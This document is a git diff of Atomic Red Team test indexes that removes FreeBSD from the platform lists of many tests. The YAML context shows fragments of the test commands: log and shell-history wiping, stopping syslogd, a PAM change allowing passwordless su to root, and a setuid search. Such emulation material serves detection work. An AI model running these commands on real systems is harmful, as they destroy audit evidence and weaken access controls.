 - [T1113 Screen Capture](../../T1113/T1113.md)
 - Atomic Test #1: Screencapture [macos]
@@ -422,7 +422,7 @@
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
+ - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
 - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
 - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -518,7 +518,7 @@
 - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- - Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
+ - Atomic Test #2: Discover Private SSH Keys [linux, macos]
 - Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
 - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
 - T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -527,10 +527,10 @@
 - [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
 - Atomic Test #1: Search Through Bash History [linux, macos]
 - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- - Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
+ - Atomic Test #1: Find AWS credentials [macos, linux]
 - Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- - Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
- - Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
+ - Atomic Test #3: Extract passwords with grep [linux, macos]
+ - Atomic Test #6: Find and Access Github Credentials [linux, macos]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -552,17 +552,17 @@
 # discovery
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- - Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
+ - Atomic Test #2: System Owner/User Discovery [linux, macos]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- - Atomic Test #2: View sudoers access [freebsd, linux, macos]
- - Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
- - Atomic Test #4: List opened files by user [freebsd, linux, macos]
- - Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
+ - Atomic Test #2: View sudoers access [linux, macos]
+ - Atomic Test #3: View accounts with UID 0 [linux, macos]
+ - Atomic Test #4: List opened files by user [linux, macos]
+ - Atomic Test #7: Enumerate users and groups [linux, macos]
 - Atomic Test #8: Enumerate users and groups [macos]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
 - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
@@ -577,9 +577,9 @@
 - T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1082 System Information Discovery](../../T1082/T1082.md)
 - Atomic Test #2: System Information Discovery [macos]
- - Atomic Test #3: List OS Information [freebsd, linux, macos]
- - Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
- - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
+ - Atomic Test #3: List OS Information [linux, macos]
+ - Atomic Test #8: Hostname Discovery [linux, macos]
+ - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
 - Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
 - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -592,16 +592,16 @@
 - Atomic Test #9: List macOS Firewall Rules [macos]
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
- - Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
- - Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
+ - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
+ - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
+ - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
- - Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
+ - Atomic Test #1: Process Discovery - ps [linux, macos]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- - Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
+ - Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
 - Atomic Test #8: Examine password policy - macOS [macos]
 - T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -609,8 +609,8 @@
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
 - Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
- - Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
- - Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
+ - Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
+ - Atomic Test #7: Remote System Discovery - sweep [linux, macos]
 - [T1046 Network Service Discovery](../../T1046/T1046.md)
 - Atomic Test #1: Port Scan [linux, macos]
 - Atomic Test #2: Port Scan Nmap [linux, macos]
@@ -648,24 +648,24 @@
 - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1496 Resource Hijacking](../../T1496/T1496.md)
- - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
+ - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
 - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
- - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
+ - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
+ - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
+ - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
+ - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
 # execution
 - T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
+ - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
 - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
@@ -684,8 +684,8 @@
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
- - Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
+ - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
+ - Atomic Test #2: Command-Line Interface [linux, macos]
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -733,19 +733,19 @@
 - T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
+ - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
 - T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
+ - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
+ - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- - Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
+ - Atomic Test #1: Data Transfer Size Limits [macos, linux]
 - T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
+ - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e21947ff75..b085bcbdec 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -968,9 +968,9 @@
 - Atomic Test #1: Simulate Patching termsrv.dll [windows]
 - Atomic Test #2: Modify Terminal Services DLL Path [windows]
 - [T1176 Browser Extensions](../../T1176/T1176.md)
- - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- - Atomic Test #3: Firefox [freebsd, linux, windows, macos]
+ - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
+ - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
+ - Atomic Test #3: Firefox [linux, windows, macos]
 - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
 - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
 - T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e7d0d73575..0837299458 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -1037,7 +1037,7 @@ defense-evasion: Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - - linux:freebsd + - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. @@ -1311,9 +1311,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -1335,9 +1334,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -1359,9 +1357,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -1383,9 +1380,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -1460,9 +1456,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: owner: description: Username of desired owner @@ -1523,7 +1518,7 @@ defense-evasion: Remove's a file's `immutable` attribute using `chflags`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_modify: description: Path of the file @@ -1572,7 +1567,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: source_file: description: Path of c source file @@ -1636,7 +1631,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: source_file: description: Path of c source file @@ -3164,7 +3159,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. 
@@ -3203,7 +3198,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -3242,7 +3237,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -3852,7 +3847,6 @@ defense-evasion: supported_platforms: - macos - linux - - linux:freebsd input_arguments: test_message: description: Test message to echo out to the screen @@ -4787,7 +4781,7 @@ defense-evasion: Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -4938,7 +4932,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | rm -rf /var/log/messages @@ -4997,7 +4991,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate --size=0 /var/log/security #size parameter \n" @@ -5042,7 +5036,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | cat /dev/null > /var/log/messages #truncating the file to zero bytes @@ -5116,7 +5110,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'echo '''' > /var/log/messages @@ -5172,7 +5166,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'unlink /var/log/messages @@ -7414,7 +7408,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'rm ~/.sh_history @@ -7438,7 +7432,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'echo "" > ~/.sh_history @@ -7463,7 +7457,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'cat /dev/null > ~/.sh_history 
@@ -7488,7 +7482,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'ln -sf /dev/null ~/.sh_history @@ -7512,7 +7506,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'truncate -s0 ~/.sh_history @@ -7540,7 +7534,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | unset HISTFILE @@ -7618,7 +7612,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependencies: - description: 'Install sshpass and create user account used for excuting @@ -7961,7 +7955,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -7999,7 +7992,6 @@ defense-evasion: description: "Use Perl to decode a base64-encoded text string and echo it to the console \n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -8067,7 +8059,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: message: description: Message to print to the screen @@ -8098,7 +8090,7 @@ defense-evasion: Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. \n" supported_platforms: - - linux:freebsd + - linux input_arguments: bash_encoded: description: Encoded @@ -8141,7 +8133,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -9755,7 +9746,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -9787,7 +9777,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -9822,7 +9811,6 @@ defense-evasion: Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. supported_platforms: - - linux:freebsd - linux - macos input_arguments: 
@@ -9849,7 +9837,6 @@ defense-evasion: This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -11175,7 +11162,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if pfctl is installed on the machine. @@ -11283,7 +11270,7 @@ defense-evasion: description: "Add and delete a rule on the Packet Filter (PF) if installed and enabled. \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if pf is installed on the machine and enabled. @@ -13706,9 +13693,8 @@ defense-evasion: Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -13741,9 +13727,8 @@ defense-evasion: Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -14938,7 +14923,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: payload: description: hello.c payload @@ -14986,7 +14971,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetUID flag @@ -15031,7 +15016,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetGID flag @@ -15100,7 +15085,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 
@@ -15114,7 +15098,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 @@ -16041,7 +16024,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: auditd_config_file_name: description: The name of the auditd configuration file to be changed @@ -16105,7 +16088,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: syslog_config_file_name: description: The name of the syslog configuration file to be changed @@ -18898,7 +18881,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: evil_command: description: Command to run after shell history collection is disabled @@ -18997,7 +18980,7 @@ defense-evasion: Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -19036,7 +19019,7 @@ defense-evasion: Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -20688,7 +20671,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | service syslogd stop @@ -21582,7 +21565,6 @@ defense-evasion: as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.\n" supported_platforms: - - linux:freebsd - linux executor: command: "swapon -a \nsleep 2\nswapoff -a\nsync\n" 
@@ -22425,7 +22407,7 @@ defense-evasion: a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand uname -v\n" supported_platforms: - - linux:freebsd + - linux input_arguments: shell_command: description: command to encode @@ -23742,7 +23724,6 @@ defense-evasion: Upon successful execution, sh is renamed to `crond` and executed. supported_platforms: - - linux:freebsd - linux executor: command: | @@ -24702,7 +24683,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: cert_filename: description: Path of the CA certificate we create @@ -25021,7 +25002,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -25053,7 +25033,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -25084,7 +25063,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -27350,7 +27328,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -27388,7 +27365,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -27577,7 +27553,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | chflags -R 0 / @@ -28397,7 +28373,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir @@ -29406,7 +29382,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -31261,7 +31236,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -31302,7 +31277,7 @@ defense-evasion: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true 
@@ -31344,7 +31319,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -33926,7 +33901,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -33965,7 +33940,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -34004,7 +33979,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -35196,9 +35171,8 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -35256,7 +35230,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command: description: Command to execute @@ -38063,7 +38037,7 @@ privilege-escalation: Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -38106,7 +38080,7 @@ privilege-escalation: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -38865,7 +38839,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: payload: description: hello.c payload @@ -38913,7 +38887,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetUID flag 
@@ -38958,7 +38932,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetGID flag @@ -39027,7 +39001,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 @@ -39041,7 +39014,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 @@ -43596,7 +43568,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command_to_add: description: Command to add to the .shrc file @@ -43617,7 +43589,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -43640,7 +43611,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -45568,7 +45538,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -45864,7 +45834,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: rc_service_path: description: Path to rc service file @@ -47322,7 +47292,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: time_spec: description: Time specification of when the command should run @@ -47866,7 +47836,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -47907,7 +47877,7 @@ privilege-escalation: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -47949,7 +47919,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true 
@@ -50010,9 +49980,8 @@ execution: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -50070,7 +50039,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command: description: Command to execute @@ -53084,7 +53053,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -53109,7 +53077,6 @@ execution: Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -53203,7 +53170,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53223,7 +53189,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53241,7 +53206,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53256,7 +53220,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53290,7 +53253,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -53337,7 +53300,7 @@ execution: with a /bin/sh shell, changes the users shell to sh, then deletes the art 